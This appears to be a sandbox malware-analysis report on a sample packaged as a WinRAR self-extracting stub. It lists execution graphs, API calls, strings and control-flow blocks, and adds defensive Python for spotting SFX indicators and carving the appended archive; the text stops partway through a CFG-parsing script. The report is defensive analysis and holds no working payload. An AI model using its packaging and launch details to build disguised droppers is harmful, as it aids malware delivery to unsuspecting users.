24141->24145 24143->24121 24144->24139 24144->24146 24145->24144 24413 7292a3 97 API calls 24145->24413 24146->24138 24158 728b82 24146->24158 24416 7298bc 24146->24416 24147 72ab1a 8 API calls 24150 728bd1 24147->24150 24149->24139 24414 727db2 101 API calls 24149->24414 24153 72ab1a 8 API calls 24150->24153 24170 728be7 24153->24170 24156 728b70 24420 726e98 77 API calls 24156->24420 24158->24147 24159 728cbc 24160 728e40 24159->24160 24161 728d18 24159->24161 24164 728e52 24160->24164 
24165 728e66 24160->24165 24184 728d49 24160->24184 24162 728d8a 24161->24162 24163 728d28 24161->24163 24172 728167 19 API calls 24162->24172 24167 728d6e 24163->24167 24175 728d37 24163->24175 24168 729215 123 API calls 24164->24168 24166 733377 75 API calls 24165->24166 24169 728e7f 24166->24169 24167->24184 24423 7277b8 111 API calls 24167->24423 24168->24184 24426 733020 123 API calls 24169->24426 24170->24159 24171 728c93 24170->24171 24178 72981a 79 API calls 24170->24178 24171->24159 24421 729a3c 82 API calls 24171->24421 24176 728dbd 24172->24176 24422 722021 74 API calls 24175->24422 24180 728de6 24176->24180 24181 728df5 24176->24181 24176->24184 24178->24171 24424 727542 85 API calls 24180->24424 24425 729155 93 API calls __EH_prolog 24181->24425 24187 728f85 24184->24187 24427 722021 74 API calls 24184->24427 24186 729090 24186->24138 24189 72a4ed 3 API calls 24186->24189 24187->24138 24187->24186 24188 72903e 24187->24188 24428 729f09 SetEndOfFile 24187->24428 24402 729da2 24188->24402 24190 7290eb 24189->24190 24190->24138 24429 722021 74 API calls 24190->24429 24193 729085 24195 729620 77 API calls 24193->24195 24195->24186 24196 7290fb 24430 726dcb 76 API calls _wcschr 24196->24430 24199 7216a4 24198->24199 24446 72cee1 24199->24446 24203 729f59 24202->24203 24205 729f63 24203->24205 24454 726d0c 78 API calls 24203->24454 24205->24037 24206->24050 24207->24046 24209 72b50f __EH_prolog 24208->24209 24214 72f1d0 82 API calls 24209->24214 24211 72b521 24215 72b61e 24211->24215 24214->24211 24216 72b630 __cftof 24215->24216 24219 7310dc 24216->24219 24222 73109e GetCurrentProcess GetProcessAffinityMask 24219->24222 24223 72b597 24222->24223 24223->24069 24229 721732 24224->24229 24226 7213d6 24226->24087 24227->24086 24228->24082 24230 721748 24229->24230 24241 7217a0 __InternalCxxFrameHandler 24229->24241 24231 721771 24230->24231 24242 726c36 76 API calls __vswprintf_c_l 24230->24242 24232 7217c7 24231->24232 24235 72178d ___std_exception_copy 
[Execution graph data for the module loaded at 0x00720000 (node identifiers, function addresses and per-node API-call counts; among the named calls: SetThreadExecutionState, GetVersionExW, FindFirstFileW/FindNextFileW/GetLastError, the delay-load helper's LoadLibraryExA/GetProcAddress/VirtualProtect/RaiseException path, and the SFX start-up routine's GetCommandLineW/OpenFileMappingW/MapViewOfFile/SetEnvironmentVariableW/DialogBoxParamW sequence). Rendered as an interactive graph in the original report; the raw edge list is not reproduced here.]

Control-flow Graph

APIs
  • Part of subcall function 00730863: GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
  • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
  • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
  • Part of subcall function 0073A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0073A655
  • Part of subcall function 0073AC16: OleInitialize.OLE32(00000000), ref: 0073AC2F
  • Part of subcall function 0073AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
  • Part of subcall function 0073AC16: SHGetMalloc.SHELL32(00768438), ref: 0073AC70
• GetCommandLineW.KERNEL32 ref: 0073DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0073DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0073DF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 0073DFCE
  • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
  • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
• CloseHandle.KERNEL32(00000000), ref: 0073DFD7
• GetModuleFileNameW.KERNEL32(00000000,0077EC90,00000800), ref: 0073DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,0077EC90), ref: 0073DFFE
• GetLocalTime.KERNEL32(?), ref: 0073E009
• _swprintf.LIBCMT ref: 0073E048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0073E05A
• GetModuleHandleW.KERNEL32(00000000), ref: 0073E061
• LoadIconW.USER32(00000000,00000064), ref: 0073E078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0073E0C9
• Sleep.KERNEL32(?), ref: 0073E0F7
• DeleteObject.GDI32 ref: 0073E130
• DeleteObject.GDI32(?), ref: 0073E140
• CloseHandle.KERNEL32 ref: 0073E183
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX1$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzw
• API String ID: 3049964643-1494992444
• Opcode ID: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
• Instruction ID: 3ce6a7dfe6a05c42f689bcca66617a72c1c8ef81e3049b9d98c8ab100d90662c
• Opcode Fuzzy Hash: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
• Instruction Fuzzy Hash: 1A61F871504349AFE720AF74AC4DF6B7BACEB04781F048429F94A921E2DBBC9D44C766
Uniqueness
Uniqueness Score: -1.00%
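The API and string lists above belong to a WinRAR self-extracting (SFX) stub: it opens the shared mapping winrarsfxmappingfile.tmp, publishes its command line, parameters, path and start time through the sfxcmd, sfxpar, sfxname and sfxstime environment variables (the start time formatted as %4d-%02d-%02d-%02d-%02d-%02d-%03d), shows the STARTDLG dialog, and extracts into the RarSFX1 temp directory. For triage, the useful consequences are that these strings identify the packaging and that the archive the stub extracts is carried as overlay after the PE image. The following helper is an added example written for this page, not code from the Joe Sandbox report or from the sample: it scans a binary for the UTF-16LE indicator strings listed above and locates the RAR marker block after the PE's last section so the payload archive can be carved for separate analysis. The RAR 4.x and RAR 5 marker bytes come from the RAR format, not from the report, the "three indicators plus an archive" threshold is the editor's heuristic, and the sample bytes are constructed inline.

```python
"""WinRAR SFX dropper triage: indicator strings plus appended-archive carving.

Added example (editor's code, not from the Joe Sandbox report or the sample).
Indicator strings are the ones the stub's API/String lists reference; RAR
marker bytes are assumed from the RAR 4.x / RAR 5 format, not shown in the report.
"""
import struct

# UTF-16LE strings the SFX stub references (from the API/String lists above).
SFX_INDICATORS = ("winrarsfxmappingfile.tmp", "sfxcmd", "sfxpar",
                  "sfxname", "sfxstime", "STARTDLG")

# RAR marker blocks; 4.x and 5 differ at byte 6, so neither is a prefix of the other.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"


def find_sfx_indicators(data: bytes) -> dict:
    """Map each indicator string present (encoded UTF-16LE) to its first offset."""
    found = {}
    for s in SFX_INDICATORS:
        off = data.find(s.encode("utf-16-le"))
        if off != -1:
            found[s] = off
    return found


def pe_image_end(data: bytes):
    """Offset just past the last section's raw data, or None if not a parseable PE.
    Bytes beyond that offset are overlay, where an SFX stub keeps its archive."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sec_table = e_lfanew + 24 + opt_size
    end = 0
    for i in range(num_sections):
        hdr = sec_table + i * 40
        if hdr + 40 > len(data):
            return None
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)  # SizeOfRawData, PointerToRawData
        end = max(end, raw_ptr + raw_size)
    return end if end <= len(data) else None


def find_rar_overlay(data: bytes):
    """Return (offset, rar_version) of the first RAR marker at or after the PE
    image end (offset 0 if the PE does not parse), or None if there is none."""
    start = pe_image_end(data) or 0
    hits = []
    for magic, version in ((RAR5_MAGIC, 5), (RAR4_MAGIC, 4)):
        off = data.find(magic, start)
        if off != -1:
            hits.append((off, version))
    return min(hits) if hits else None


def carve_archive(data: bytes):
    """Return the appended archive bytes for separate analysis, or None."""
    hit = find_rar_overlay(data)
    return data[hit[0]:] if hit else None


def triage(data: bytes) -> dict:
    """Combine both signals. Requiring several indicators plus an archive is the
    editor's heuristic; it identifies WinRAR SFX packaging, not maliciousness."""
    indicators = find_sfx_indicators(data)
    hit = find_rar_overlay(data)
    return {
        "is_winrar_sfx": len(indicators) >= 3 and hit is not None,
        "indicators": indicators,
        "rar_offset": hit[0] if hit else None,
        "rar_version": hit[1] if hit else None,
    }


def build_constructed_sample(rar_version: int = 5) -> bytes:
    """Constructed stand-in for an SFX dropper (not the real sample): a minimal PE
    with one section holding the indicator strings, then a RAR marker plus dummy
    archive bytes as overlay."""
    section = b"".join(s.encode("utf-16-le") + b"\0\0" for s in SFX_INDICATORS)
    section += b"\0" * (-len(section) % 16)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE header right after DOS header
    # COFF header: i386, one section, no optional header (enough for pe_image_end).
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    raw_ptr = 0x40 + len(coff) + 40  # section data follows the single section header
    sec = b".rdata".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(section), 0x1000, len(section), raw_ptr, 0, 0, 0, 0, 0x40000040)
    magic = RAR5_MAGIC if rar_version == 5 else RAR4_MAGIC
    return bytes(dos) + coff + sec + section + magic + b"\0" * 0x20
```

Run `triage(open(path, "rb").read())` on a suspect file; when `rar_offset` is set, `carve_archive` yields bytes that start with the RAR marker and can be listed or extracted with an archive tool in an isolated environment. Legitimate WinRAR SFX installers carry the same indicator strings, so the result says how the file is packaged; the verdict on the payload has to come from analysing the carved archive's contents.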

Control-flow Graph
[Basic-block graph for 0072A69B-0072A811 (executed/not-executed colouring not reproduced): entry block 72a69b-72a6bf calls 73ec50, then branches to FindFirstFileW at 72a6c1 or FindNextFileW at 72a727; on FindFirstFileW failure the 72a6d0 block calls 72bb03 and retries FindFirstFileW at 72a6e4, with GetLastError at 72a6fe and 72a732 on the failure paths; the common tail 72a742-72a7ff calls 730602, 72c310 and 7315da (three times) before the exit block 72a804-72a811.]
APIs
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
  • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
• FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
• GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
• FindNextFileW.KERNEL32(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A728
• GetLastError.KERNEL32(?,?,?,?,0072A592,000000FF,?,?), ref: 0072A734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                              • Instruction ID: de6ccd0a550585c47d3b77673c22e88016b2180b870af1ae5651ac60ffc59e41
                                                                                              • Opcode Fuzzy Hash: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                              • Instruction Fuzzy Hash: B2419272500225EBCB25DF68DC88AEAF7B8FB48350F104196E56EE3240D7386E90CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E16
                                                                                              • ExitProcess.KERNEL32 ref: 00747E28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                              • Instruction ID: 872434054aed0b400523c31108c371dc0ef3df88f67564a4444e4fabbfc99b5d
                                                                                              • Opcode Fuzzy Hash: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                              • Instruction Fuzzy Hash: A2E04631000648EBCF066F20CD0DA8A3F6AEB00382B008594F8098B132CB7EDE52CA84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                              • Instruction ID: 78e3264be0b5a8df96321a11d434ea08955e716e561a5b72cec62b00196629d8
                                                                                              • Opcode Fuzzy Hash: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                              • Instruction Fuzzy Hash: 0C824E70905165EEDF65CF64D885BFAB7B9BF05300F0C41B9E8499B243CB3A5A88C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0073B7E5
                                                                                                • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                                • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073B8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 0073B902
                                                                                              • TranslateMessage.USER32(?), ref: 0073B910
                                                                                              • DispatchMessageW.USER32(?), ref: 0073B91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0073B93D
                                                                                              • EndDialog.USER32(?,00000001), ref: 0073B960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0073B983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073B99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073B9B1
                                                                                                • Part of subcall function 0073D453: _wcschr.LIBVCRUNTIME ref: 0073D45C
                                                                                                • Part of subcall function 0073D453: _wcslen.LIBCMT ref: 0073D47D
                                                                                              • SetFocus.USER32(00000000), ref: 0073B9B8
                                                                                              • _swprintf.LIBCMT ref: 0073BA24
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                                • Part of subcall function 0073D4D4: GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                                • Part of subcall function 0073D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0073BA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0073BA90
                                                                                              • GetTickCount.KERNEL32 ref: 0073BAAE
                                                                                              • _swprintf.LIBCMT ref: 0073BAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 0073BAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0073BB43
                                                                                              • _swprintf.LIBCMT ref: 0073BB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0073BBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 0073BBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0073BC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0073BC6F
                                                                                              • Sleep.KERNEL32(00000064), ref: 0073BCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0073BCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0073BCEB
                                                                                              • _swprintf.LIBCMT ref: 0073BD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,007535F4), ref: 0073BD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0073BD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0073BDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0073BDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073BE68
                                                                                              • _wcslen.LIBCMT ref: 0073BEBE
                                                                                              • _swprintf.LIBCMT ref: 0073BEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073BF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0073BF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0073BF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0073BF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0073BF85
                                                                                              • SetWindowTextW.USER32(00000000,0076A472), ref: 0073BFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0073C007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0073C0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0073C197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0073C1D9
                                                                                                • Part of subcall function 0073C73F: __EH_prolog.LIBCMT ref: 0073C744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073C1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX1$LICENSEDLG$PDu<s$STARTDLG$^s$__tmp_rar_sfx_access_check_%u$hs$winrarsfxmappingfile.tmp$Qu
                                                                                              • API String ID: 4093411769-3706725595
                                                                                              • Opcode ID: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                              • Instruction ID: 0d9ac4ed9b2ee2f1ffaacead047d36450ce664eda37f6f93e760c6712464fb7c
                                                                                              • Opcode Fuzzy Hash: 50e4ab125df4b1a5d3c8b089f49e8b5ff65317a735412f1585aaaf729c8a25ba
                                                                                              • Instruction Fuzzy Hash: E242E4B1940358FAFB229B749C4EFBE3B6CAB01B40F108155F645B60D3DBBC5A448B66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph
                                                                                              (one line per basic block: id, address range, calls made in the block, successor blocks; the Executed / Not Executed colouring of the rendered graph is not carried in this text export)
                                                                                              • 269: 730863-730886; call 73ec50, GetModuleHandleW; -> 272, 273
                                                                                              • 272: 7308e7-730b48; -> 274, 275
                                                                                              • 273: 730888-73089f; GetProcAddress; -> 276, 277
                                                                                              • 274: 730c14-730c40; GetModuleFileNameW, call 72c29a, call 730602; -> 291
                                                                                              • 275: 730b4e-730b59; call 7475fb; -> 274, 286
                                                                                              • 276: 7308a1-7308b7; -> 277
                                                                                              • 277: 7308b9-7308c9; GetProcAddress; -> 279, 280
                                                                                              • 279: 7308e5; -> 272
                                                                                              • 280: 7308cb-7308e0; -> 279
                                                                                              • 286: 730b5f-730b8d; GetModuleFileNameW, CreateFileW; -> 289, 290
                                                                                              • 289: 730c08-730c0f; CloseHandle; -> 274
                                                                                              • 290: 730b8f-730b9b; SetFilePointer; -> 289, 292
                                                                                              • 291: 730c42-730c4e; call 72b146; -> 298, 299
                                                                                              • 292: 730b9d-730bb9; ReadFile; -> 289, 295
                                                                                              • 295: 730bbb-730be0; -> 297
                                                                                              • 297: 730bfd-730c06; call 730371; -> 289, 306
                                                                                              • 298: 730c50-730c5b; call 73081b; -> 308
                                                                                              • 299: 730c7d-730ca4; call 72c310, GetFileAttributesW; -> 309, 310
                                                                                              • 306: 730be2-730bfc; call 73081b; -> 297
                                                                                              • 308: 730c5d-730c7b; CompareStringW; -> 299, 309
                                                                                              • 309: 730ca6-730caa; -> 291, 313
                                                                                              • 310: 730cae; -> 311
                                                                                              • 311: 730cb0-730cb5; -> 314, 315
                                                                                              • 313: 730cac; -> 311
                                                                                              • 314: 730cb7; -> 316
                                                                                              • 315: 730cec-730cee; -> 317, 318
                                                                                              • 316: 730cb9-730ce0; call 72c310, GetFileAttributesW; -> 323, 324
                                                                                              • 317: 730cf4-730d0b; call 72c2e4, call 72b146; -> 328, 329
                                                                                              • 318: 730dfb-730e05; (no successors)
                                                                                              • 323: 730ce2-730ce6; -> 316, 326
                                                                                              • 324: 730cea; -> 315
                                                                                              • 326: 730ce8; -> 315
                                                                                              • 328: 730d73-730da6; call 724092, AllocConsole; -> 335, 336
                                                                                              • 329: 730d0d-730d6e; call 73081b * 2, call 72e617, call 724092, call 72e617, call 73a7e4; -> 335
                                                                                              • 335: 730df3-730df5; ExitProcess; (no successors)
                                                                                              • 336: 730da8-730ded; GetCurrentProcessId, AttachConsole, call 743e13, GetStdHandle, WriteConsoleW, Sleep, FreeConsole; -> 335
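The control-flow graph dumps in this section are exported as a single line of tokens: a block id followed by its address range and the calls inside it, and `a->b` tokens for edges. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; the token grammar it assumes (`<id> <addr-range> <label>*` opens a block, `call <addr>` is an internal call, `* N` repeats the previous label) is inferred from the dumps on this page and is an assumption. The embedded sample is the first dump in this section, the FindFirstFileW/FindNextFileW loop at 72a69b, copied from the report. It reconstructs blocks and successors, then answers the questions a triager asks of such a graph: which block is the entry, which blocks have no successors, which blocks call a given API, and which calls lie on the shortest path between two blocks.

```python
import re
from collections import deque
from typing import Dict, List, Tuple

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "72a69b-72a6bf" or a single "72a717"


def parse_cfg(dump: str) -> Tuple[Dict[int, dict], Dict[int, List[int]]]:
    """Tokenise the one-line export into {id: {"range", "calls"}} and {id: successors}.

    Token grammar is an assumption inferred from the dumps, not vendor documentation:
    `<id> <addr-range>` opens a block, `<a>-><b>` is an edge, `call <addr>` is a call
    to an internal function, `* N` means the previous label was repeated N times.
    """
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, dict] = {}
    edges: Dict[int, List[int]] = {}
    cur = None
    i = 0
    while i < len(tokens):
        t = tokens[i]
        m = EDGE.match(t)
        if m:
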